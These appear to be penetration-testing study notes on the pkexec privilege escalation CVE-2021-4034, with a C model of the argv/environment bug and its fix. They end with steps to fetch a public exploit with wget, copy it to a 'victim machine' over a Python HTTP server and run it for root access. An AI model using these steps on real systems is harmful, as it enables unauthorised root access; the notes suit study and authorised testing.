CVE-2021-4034

NIST-CVE-2021-4034

A local privilege escalation vulnerability was found in polkit's pkexec utility. pkexec is a setuid-root tool that lets unprivileged users run commands as privileged users according to predefined policies. Vulnerable versions of pkexec do not handle an argument count of zero correctly: they read past the end of argv into the environment block and then write a PATH-resolved name back into it, as if it were argv. An attacker can craft environment variables so that this write reintroduces a variable that the setuid sanitization had removed, which induces pkexec to execute arbitrary code. A successful attack yields a local privilege escalation, giving an unprivileged user administrative rights on the target machine.
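The mechanism in the description above, as an added example that is not part of this note or of polkit's code: a C model of the kernel's argv/envp stack layout and of the three lines in pkexec's main() that read argv[n] and write the PATH-resolved program name back into the same slot. The names (find_in_path, env_lookup, pkexec_argv_handling, FILES) and the in-memory file list are assumptions made for the model; the real exploit additionally needs the planted file to be executable and relies on GCONV_PATH being honoured later, when pkexec prints an error through iconv.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Paths that "exist" in this model (constructed; nothing touches the real
   filesystem). "GCONV_PATH=./pwnkit" is the file the exploit plants inside a
   directory whose name is literally "GCONV_PATH=.". */
static const char *const FILES[] = { "GCONV_PATH=./pwnkit", "/usr/bin/id", NULL };

static int file_exists(const char *p)
{
    for (size_t i = 0; FILES[i] != NULL; i++)
        if (strcmp(FILES[i], p) == 0) return 1;
    return 0;
}

/* Stand-in for g_find_program_in_path(): returns a malloc'd "<dir>/<name>"
   for the first hit along a ':'-separated search path, or NULL. */
static char *find_in_path(const char *name, const char *search)
{
    if (search == NULL) return NULL;
    for (const char *p = search;; p = strchr(p, ':') + 1) {
        const char *colon = strchr(p, ':');
        size_t dlen = colon ? (size_t)(colon - p) : strlen(p);
        char *cand = malloc(dlen + strlen(name) + 2);
        if (cand == NULL) return NULL;
        memcpy(cand, p, dlen);
        cand[dlen] = '/';
        strcpy(cand + dlen + 1, name);
        if (file_exists(cand)) return cand;
        free(cand);
        if (colon == NULL) return NULL;
    }
}

/* getenv() over the modelled environment instead of the real one. */
static const char *env_lookup(char **envp, const char *name)
{
    size_t n = strlen(name);
    for (size_t i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], name, n) == 0 && envp[i][n] == '=')
            return envp[i] + n + 1;
    return NULL;
}

/* The vulnerable part of pkexec's main(), reduced to what matters: read
   argv[n] (n == 1 when no options are given), resolve it through PATH if it
   is not absolute, and store the result back into argv[n]. The kernel places
   envp right after argv's terminating NULL, so with argc == 0 argv[1] is
   envp[0]: the read is out of bounds and the write lands in the environment. */
static char *pkexec_argv_handling(int argc, char **argv)
{
    char **envp = argv + argc + 1;
    int n = 1;
    char *path = argv[n];
    if (path == NULL) return NULL;
    if (path[0] != '/') {
        char *s = find_in_path(path, env_lookup(envp, "PATH"));
        if (s == NULL) return NULL;
        argv[n] = path = s;        /* overwrites envp[0] when argc == 0 */
    }
    return path;
}

/* Same handling with the upstream fix: refuse to run with an empty argv. */
static char *pkexec_argv_handling_fixed(int argc, char **argv)
{
    if (argc < 1) return NULL;
    return pkexec_argv_handling(argc, argv);
}

/* PwnKit invocation: execve(pkexec, {NULL}, {"pwnkit", "PATH=GCONV_PATH=.", NULL}).
   Returns the GCONV_PATH value visible in the environment afterwards, or NULL
   if the environment stayed clean. The stack is static so the pointer survives. */
static const char *pwnkit_model(int use_fixed)
{
    static char *stack[4];
    stack[0] = NULL;                          /* argv[0]: end of an empty argv */
    stack[1] = (char *)"pwnkit";              /* envp[0], which is also argv[1] */
    stack[2] = (char *)"PATH=GCONV_PATH=.";   /* envp[1] */
    stack[3] = NULL;
    char **argv = stack, **envp = stack + 1;
    if (use_fixed) pkexec_argv_handling_fixed(0, argv);
    else           pkexec_argv_handling(0, argv);
    return env_lookup(envp, "GCONV_PATH");
}

/* Ordinary invocation for contrast: "pkexec id" with argc == 2. */
static const char *normal_model(void)
{
    static char *stack[] = { (char *)"pkexec", (char *)"id", NULL,
                             (char *)"PATH=/usr/bin", NULL };
    return pkexec_argv_handling(2, stack);
}

int main(void)
{
    const char *vuln = pwnkit_model(0), *fixed = pwnkit_model(1);
    printf("normal:     argv[1] -> %s\n", normal_model());
    printf("vulnerable: GCONV_PATH=%s\n", vuln ? vuln : "(unset)");
    printf("fixed:      GCONV_PATH=%s\n", fixed ? fixed : "(unset)");
    return 0;
}
```

In the vulnerable run the environment ends up holding GCONV_PATH=./pwnkit even though no such variable was ever passed in; that is the whole primitive, and the rest of the exploit is just what pkexec does with it afterwards. With the fix the function returns before touching argv and the environment is left as it was.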

Prerequisite: pkexec is present with the SUID bit set (mode rwsr-xr-x, owner root) and is an unpatched build. The bug was present from pkexec's first release until the fix published in January 2022, so a box patched after that is not exploitable.
The exploit: https://github.com/Almorabea/pkexec-exploit

wget https://raw.githubusercontent.com/Almorabea/pkexec-exploit/refs/heads/main/CVE-2021-4034.py

Or take the code from CVE-2021-4034-exploit

and transfer it to the victim machine.

Transfer files

Using Python, from the folder on the source machine that contains the file to send (e.g. file.txt): #flashcard

python -m http.server 4545

On the destination machine

wget http://IP_SOURCE_MACHINE:4545/file.txt

Run the exploit from a directory the current user can write to (it drops the gconv directory and a shared object on disk), and clean those up afterwards. Note that pkexec logs the environment error it hits to syslog (auth.log), so the attempt is visible to defenders.

python3 CVE-2021-4034.py